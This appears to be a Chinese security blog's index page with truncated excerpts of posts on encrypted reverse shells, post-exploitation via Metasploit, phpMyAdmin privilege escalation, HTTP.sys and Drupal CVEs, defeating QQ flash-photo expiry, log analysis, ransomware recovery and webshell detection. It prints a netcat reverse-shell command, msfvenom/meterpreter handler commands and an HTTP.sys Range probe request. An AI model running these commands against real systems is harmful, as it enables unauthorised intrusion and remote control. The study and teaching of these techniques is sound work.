OpenSSL反弹加密Shell
一、前言在进行红队渗透测试的后渗透阶段为了进一步横行渗透往往需要反弹 shell,这里列出了使用各种语言进行反弹 shell 的方法,我发现这种反弹 shell 方式都有一个缺点,那就是所有的流量都是明文传输的。
我们使用 nc 反弹 shell 进行测试
Kali: nc -lvp 4444Win7: nc 192.168.1.6 4444 -e cmd
使用 wireshark 可以直接看到我们执行的命令和返回信息
在这种情况下当我们进行操作时,网络防御检测系统(IDS、IPS等)会获取到我们的通信内容并进行告警和阻止,因此需要对通信内容进行混淆或加密,这时可以选择使用 OpenSSL 反弹一个加密 shell。
二、OpenSSL简介在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份
利用 OpenSSL 反弹 shell 之前需要生成自签名证书
三、使用OpenSSL生成自签名证书openssl req -x509 -newkey rsa:2048 -keyout key.pem -o ...
使用Kali进行内网渗透
一、网络拓扑图假如我们拿到了一台主机比如Win2008的shell,如何通过该主机进行内网渗透,拿到比如下图中数据服务器的最高权限?
二、Win2008主机上线msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 -f exe > /var/www/html/w01ke.exemsfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.0.196ser lport 4444exploit
三、简单信息收集信息收集之前可以输入help了解一下meterpreter下的命令,其中有信息收集,提权等多个模块,自行了解
(1)查看目标主机当前用户与权限meterpreter > getuid
(2)查看目标主机系统相关信息meterpreter> sysinfo
(3)查看目标主机路由表meterpreter > route
(4) ...
2022年3-4月总结(第01期)
我自认为我自己不是个喜欢记录、分享生活的人,所以当我现在想看看我之前遇见过什么有意思的或烦恼的事情,发现都没有,现在开始记录也不晚,打算开个板块专门记录自己的一些生活和总结。总结分为三部分
与长亭的开始
疫情下的上海生活
自我审视及计划
与长亭的开始 在我刚入安全没多久,就已经认识了解长亭了,直至今日我都觉得长亭是顶尖的网络信息安全公司之一,也了解到P牛和华电许少都曾在长亭工作过,这让我更加向往长亭的学习氛围,很想加入长亭与师傅们一起学习
由于一直关注了长亭的B站号,在一次动态中,了解到长亭将会进行一次招聘直播
在直播当天,进入了直播间,加了HR小姐姐的微信,紧张的将简历发了出去
经过初试和复试,终于拿到了我最想去公司之一的offer!
面试通过了,接下来的问题就是让学校放我出去,经过各科老师的同意和辅导员的批准,我的出校实习申请通过了!
通过了实习申请,租房子成了一大问题
&ems ...
phpMyAdmin提权
一、条件
能成功登录到phpMyAdmin里去
有读、写、执行的权限
知道网站的绝对路径
二、操作步骤1、爆数据库安装路径(1)SQL语句查询SHOW GLOBAL VARIABLES LIKE "%datadir%";select @@basedir;
因为phpstudy是集成环境,所以网站物理路径是D:\phpstudy_pro\WWW
(2)敏感文件直接在url后面输入phpinfo.php,看看能不能读出这个文件,如果存在就会把网站的绝对路径显示出来,这样的情况特少,因为网站管理人员不可能把这个测试页面在互联网上面直接显示出来,他们或许会更改路径或许会设置目录访问权限;
(3)扫描网站使用扫描工具对网站进行扫扫描;扫描一些phpinfo.php info.php php.php test.php等等;
(4)读取配置文件
Windows2003 IIS 6
C:\Windows/system32\inetsrv\metabase.xml
Win2008/2012 IIS 7.5
C:\Windows\System32\inetsrv\con ...
如何纯手工破解QQ闪照?不限次数观看
一、杂谈有的时候遇到心仪的女/男孩子发照片,或者是hxd发的好东西,或者是一些涉及信息泄露的照片,大多数都是以闪照的形式接收。但如果想反复查看几次,应该怎么办呢?
下面教大家手工的方式实现无限次观看闪照,分为视频教程和图文演示
二、视频教程(function(){var player = new DPlayer({"container":document.getElementById("dplayer1"),"theme":"#da4e7f","screenshot":true,"video":{"url":"/video/2022042201.mp4","pic":"https://w01ke-1305929791.cos.ap-shanghai.myqcloud.com/img/1650599015839-05a1e65d-5801-400f-8688-93b08967ffb1.jpeg"}});window.dplayers||(window.dplayers=[]);window.dplayers.push(player);})()
三、图文演示我们正常收到闪照查看5秒完毕后 ...
HTTP.sys远程代码执行(CVE-2015-1635)
前言最近和师傅们参与了一些众测项目,发现师傅们提交了很多关于HTTP.sys远程代码执行的漏洞,于是在网上搜集了些资料进行学习
一、漏洞概述1、HTTP.sys简介HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sys。HTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞
我们通过给IIS服务器发送这样格式的HTTP请求,就可以触发(检测)这个漏洞:
GET / HTTP/1.1Host: stuffRange: bytes=0-18446744073709551615
若IIS服务器返回“Requested Range Not Satisfiable”,则是存在漏洞,否则如果返回“The request has an invalid header name”,则说明漏洞已经修补。
2、漏洞成因远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当HTTP.sys未正确分析经特殊设计的 HTTP 请求时会导致此漏洞
3、漏洞危害攻击者只需要发 ...
Drupal远程代码执行(CVE-2018-7600)
一、漏洞简介Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。
二、漏洞原理该漏洞的产生的根本原因在于Drupal对表单的渲染上。
Drupal为了在表单渲染过程中能够动态修改数据,从6.x版本开始便引入了“Drupal Form API”的概念。 相关文档如下:https://api.drupal.org/api/drupal/elements/8.6.x
这些“可渲染的数组(Renderable arrays)”就是引发此次漏洞的”元凶”,它由一个key-value结构存储,其中key都以#(hash sign)开头,如下所示
[ ‘#type’ => ‘markup’, ‘#markup’ => ‘<em>some text</em>’ ...
Windows日志分析
一、Windows事件日志简介Windows系统日志是记录系统中硬件、软件和系统问题的信息,同时还可以监视系统中发生的事件。用户可以通过它来检查错误发生的原因,或者寻找受到攻击时攻击者留下的痕迹。
Windows主要有以下三类日志记录系统事件:应用程序日志、系统日志和安全日志。
系统和应用程序日志存储着故障排除信息,对于系统管理员更为有用。 安全日志记录着事件审计信息,包括用户验证(登录、远程访问等)和特定用户在认证后对系统做了什么,对于调查人员而言,更有帮助。
1、系统日志记录操作系统组件产生的事件,主要包括驱动程序、系统组件和应用软件的崩溃以及数据丢失错误等。系统日志中记录的时间类型由Windows NT/2000操作系统预先定义。
默认位置: %SystemRoot%\System32\Winevt\Logs\System.evtx
2、应用程序日志包含由应用程序或系统程序记录的事件,主要记录程序运行方面的事件,例如数据库程序可以在应用程序日志中记录文件错误,程序开发人员可以自行决定监视哪些事件。如果某个应用程序出现崩溃情况,那么我们可以从程序事件日志中找到相应的记录,也许会有 ...
勒索病毒自救指南
一、前言经常会有一些小伙伴问:中了勒索病毒,该怎么办,可以解密吗?
第一次遇到勒索病毒是在早几年的时候,客户因网站访问异常,进而远程协助进行排查。登录服务器,在站点目录下发现所有的脚本文件及附件后缀名被篡改,每个文件夹下都有一个文件打开后显示勒索提示信息,这便是勒索病毒的特征。
出于职业习惯,我打包了部分加密文件样本和勒索病毒提示信息用于留档,就在今天,我又重新上传了样本,至今依然无法解密。
作为一个安全工程师,而非一个专业的病毒分析师,我们可以借助各大安全公司的能力,寻找勒索病毒的解密工具。
本文整理了一份勒索病毒自救指南,通过勒索病毒索引引擎查找勒索病毒相关信息,再通过各个安全公司提供的免费勒索软件解密工具解密。当然,能否解密全凭运气,so,平时还是勤打补丁多备份。
二、勒索病毒搜索引擎在勒索病毒搜索引擎输入病毒名、勒索邮箱、被加密后文件的后缀名,或直接上传被加密文件、勒索提示信息,即可可快速查找 到病毒详情和解密工具。
这些网站的解密能力还在持续更新中,是值得收藏的几个勒索病毒工具型网站。
【360】 勒索病毒搜索引擎,支持检索超过800种常见勒索病毒
官网:http: ...
如何发现隐藏的WebShell后门
一、前言如何在百万行代码里发现隐藏的后门?
试想一下,如果你的网站被入侵,攻击者留下隐藏的后门,你真的都可以找出来吗?面对一个大中型的应用系统,数以百万级的代码行,是不可能做到每个文件每段代码进行手工检查的。
即使是一款拥有 99.9% 的 Webshell 检出率的检测引擎,依然可能存在 Webshell 绕过的情况。另外,像暗链、网页劫持、页面跳转等常见的黑帽 SEO 手法,也很难通过手动检测或工具检测全部识别出来。
最好的方式就是做文件完整性验证。通过与原始代码对比,可以快速发现文件是否被篡改以及被篡改的位置。当然,第一个前提是,你所在的团队已具备代码版本管理的能力,如果你是个人站长,相信你已经备份了原始代码。
本文将结合实际应用,介绍几种文件完整性验证方式,可以帮助你找出代码中所有隐藏的后门。
二、方法1、文件 MD5 校验下载D盾_Web查杀工具的时候,我们可以留意到下载的压缩包里,除了有一个 exe 可执行文件,还有一个文件 md5 值。这个是软件作者在发布软件时,通过 md5 算法计算出该 exe 文件的”特征值”。
下载地址:http://www.d99net.net/ ...